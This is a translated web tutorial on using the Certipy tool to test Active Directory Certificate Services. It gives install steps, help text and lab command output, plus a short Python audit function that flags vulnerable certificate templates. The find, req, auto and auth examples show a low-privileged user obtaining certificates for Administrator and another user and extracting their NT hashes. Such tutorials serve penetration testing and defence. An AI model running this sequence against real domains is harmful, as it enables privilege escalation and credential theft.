
[Web Pentesting] Penetration testing workflow: how to use Certipy to check Active Directory certificate security


About Certipy

Certipy is a powerful Python-based tool that helps researchers enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

Installation

Clone the project source to a local machine with the following command:

git clone https://github.com/ly4k/Certipy.git

Next, switch to the project root directory in a terminal and run:

$ python3 setup.py install

Don't forget to add the Python scripts directory to the system PATH.

Usage

$ certipy -h
usage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
               target {find,req,auth,auto} ...

Active Directory certificate abuse

positional arguments:
  target                [[domain/]username[:password]@]<target name or address>
  {find,req,auth,auto}  Action
    find                Find certificate templates
    req                 Request a new certificate
    auth                Authenticate using a certificate
    auto                Automatically abuse certificates for privilege escalation

optional arguments:
  -h, --help            Show this help message
  -debug                Turn DEBUG output on
  -no-pass              Don't ask for a password
  -k                    Use Kerberos authentication.
  -dc-ip ip address     IP address of the target domain controller

connection:
  -target-ip ip address
                        IP address of the target machine
  -nameserver nameserver  Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

Usage examples

Automation

In the example below, the user john is a low-privileged user who can enroll in the Copy of Web Server template:

$ certipy 'predator/john:Passw0rd@dc.predator.local' auto
[*] Trying template 'Copy of Web Server' with CA 'predator-DC-CA'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'Administrator'
[*] Saved certificate to '1.crt'
[*] Saved private key to '1.key'
[*] Using UPN: 'Administrator@predator'
[*] Trying to get TGT...
[*] Saved credential cache to 'Administrator.ccache'
[*] Trying to retrieve NT hash for 'Administrator@predator'
[*] Got NT hash for 'Administrator@predator': fc525c9683e8fe067095ba2ddc971889

By default the tool targets the Administrator user; the -user parameter can be used to create a certificate for a different user.

Find

The find action finds certificate templates enabled on one or more CAs.

Finding vulnerable templates

The -vulnerable parameter searches for vulnerable certificate templates:

$ certipy 'predator/john:Passw0rd@dc.predator.local' find -vulnerable
[*] Finding vulnerable certificate templates for 'john'
User
  Name                                  : predator\john
  Groups                                :
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    DNS Name                            : dc.predator.local
    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local
    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D
    Certificate Validity Start          : 2021-10-06 11:32:01+00:00
    Certificate Validity End            : 2026-10-06 11:42:01+00:00
    User Specified SAN                  : Disabled
    CA Permissions
      Owner                             : BUILTIN\Administrator
      Access Rights
        ManageCertificates              : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        ManageCa                        : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        Enroll                          : Authenticated Users
Vulnerable Certificate Templates
  0
    CAs                                 : predator-DC-CA
    Template Name                       : Copy of Web Server
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  :
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Enterprise Admins
                                          Authenticated Users
      Object Control Permissions
        Owner                           : predator\Administrator
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
    Vulnerable Reasons                  : 'Authenticated Users' can enroll, enrollee supplies subject and template allows authentication
                                          'Authenticated Users' can enroll and template has dangerous EKU

The -user parameter finds vulnerable certificate templates for the specified user; by default the current user is used.
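As an added example (not Certipy's own code), the following Python re-implements the two checks behind the "Vulnerable Reasons" lines in the find output above, run over constructed template records; which principals count as low-privileged and which EKUs permit authentication are assumptions of this example.

```python
# Added example, not Certipy's own code: re-implements the two "Vulnerable Reasons"
# checks reported in the find -vulnerable output above as an audit over template records.
# Which principals count as low-privileged is an assumption made for this example.
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}
# EKUs that let a certificate authenticate a user (Kerberos PKINIT / Schannel); assumed set.
AUTH_EKUS = {"Client Authentication", "Smart Card Logon", "PKINIT Client Authentication", "Any Purpose"}

def low_priv_enrollers(template):
    # Strip the "DOMAIN\" prefix so predator\Domain Users matches the well-known name.
    names = {p.split("\\")[-1] for p in template["enrollment_rights"]}
    return sorted(names & LOW_PRIV_PRINCIPALS)

def allows_authentication(ekus):
    # An empty EKU list means "valid for any purpose", authentication included.
    return not ekus or bool(set(ekus) & AUTH_EKUS)

def has_dangerous_eku(ekus):
    return not ekus or "Any Purpose" in ekus

def vulnerable_reasons(template):
    """Return the reasons a low-privileged enrollee could abuse this template, or []."""
    enrollers = low_priv_enrollers(template)
    if not enrollers:
        return []
    # Manager approval (PendAllRequests) or a required co-signature blocks automatic issuance.
    if template["authorized_signatures_required"] > 0 or "PendAllRequests" in template["enrollment_flag"]:
        return []
    who = ", ".join(f"'{p}'" for p in enrollers)
    reasons = []
    if "EnrolleeSuppliesSubject" in template["certificate_name_flag"] and allows_authentication(template["eku"]):
        reasons.append(f"{who} can enroll, enrollee supplies subject and template allows authentication")
    if has_dangerous_eku(template["eku"]):
        reasons.append(f"{who} can enroll and template has dangerous EKU")
    return reasons

# Constructed records mirroring the two templates shown in the find output above.
COPY_OF_WEB_SERVER = {
    "enrollment_rights": ["predator\\Domain Admins", "predator\\Enterprise Admins", "Authenticated Users"],
    "certificate_name_flag": ["EnrolleeSuppliesSubject"], "enrollment_flag": [],
    "authorized_signatures_required": 0, "eku": [],
}
USER = {
    "enrollment_rights": ["predator\\Domain Admins", "predator\\Domain Users", "predator\\Enterprise Admins"],
    "certificate_name_flag": ["SubjectRequireDirectoryPath", "SubjectRequireEmail", "SubjectAltRequireEmail", "SubjectAltRequireUpn"],
    "enrollment_flag": ["AutoEnrollment", "PublishToDs", "IncludeSymmetricAlgorithms"],
    "authorized_signatures_required": 0, "eku": ["Encrypting File System", "Secure Email", "Client Authentication"],
}
```

Enabling manager approval (PendAllRequests) or removing EnrolleeSuppliesSubject on the template clears the corresponding reason, which is how the same function can be used to confirm a remediation.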

Finding all templates

$ certipy 'predator/john:Passw0rd@dc.predator.local' find
[*] Finding certificate templates for 'john'
User
  Name                                  : predator\john
  Groups                                :
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    DNS Name                            : dc.predator.local
    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local
    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D
    Certificate Validity Start          : 2021-10-06 11:32:01+00:00
    Certificate Validity End            : 2026-10-06 11:42:01+00:00
    User Specified SAN                  : Disabled
    CA Permissions
      Owner                             : BUILTIN\Administrator
      Access Rights
        ManageCertificates              : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        ManageCa                        : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        Enroll                          : Authenticated Users
Certificate Templates
  0
    CAs                                 : predator-DC-CA
    Template Name                       : User
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectRequireEmail
                                          SubjectAltRequireEmail
                                          SubjectAltRequireUpn
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
                                          IncludeSymmetricAlgorithms
    Authorized Signatures Required      : 0
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Domain Users
                                          predator\Enterprise Admins
      Object Control Permissions
        Owner                           : predator\Enterprise Admins
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
[...]
  11
    CAs                                 : predator-DC-CA
    Template Name                       : Copy of Web Server
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  :
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Enterprise Admins
                                          Authenticated Users
      Object Control Permissions
        Owner                           : predator\Administrator
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator

Request

The user john requests a valid authentication certificate on behalf of the user jane, since predator-DC-CA has the Copy of Web Server template enabled:

$ certipy 'predator/john:Passw0rd@dc.predator.local' req -template 'Copy of Web Server' -ca 'predator-DC-CA' -alt 'jane'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'jane'
[*] Saved certificate to '2.crt'
[*] Saved private key to '2.key'

Requesting a certificate as the current user

$ certipy 'predator/john:Passw0rd@dc.predator.local' req -template 'User' -ca 'predator-DC-CA'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'john@predator.local'
[*] Saved certificate to '3.crt'
[*] Saved private key to '3.key'

Authentication

The auth action authenticates with the supplied certificate using the PKINIT Kerberos extension:

$ certipy 'predator/jane@dc.predator.local' auth -cert ./2.crt -key ./2.key
[*] Using UPN: 'jane@predator'
[*] Trying to get TGT...
[*] Saved credential cache to 'jane.ccache'
[*] Trying to retrieve NT hash for 'jane@predator'
[*] Got NT hash for 'jane@predator': 077cccc23f8ab7031726a3b70c694a49

Project

Certipy on GitHub: https://github.com/ly4k/Certipy

References

https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

https://github.com/dirkjanm/PKINITtools


Published by 黑帽达人官网; the content does not represent the site's position. For reprints, contact the author and cite the source: https://m.czlg.net/article/wangzhanseo/596.html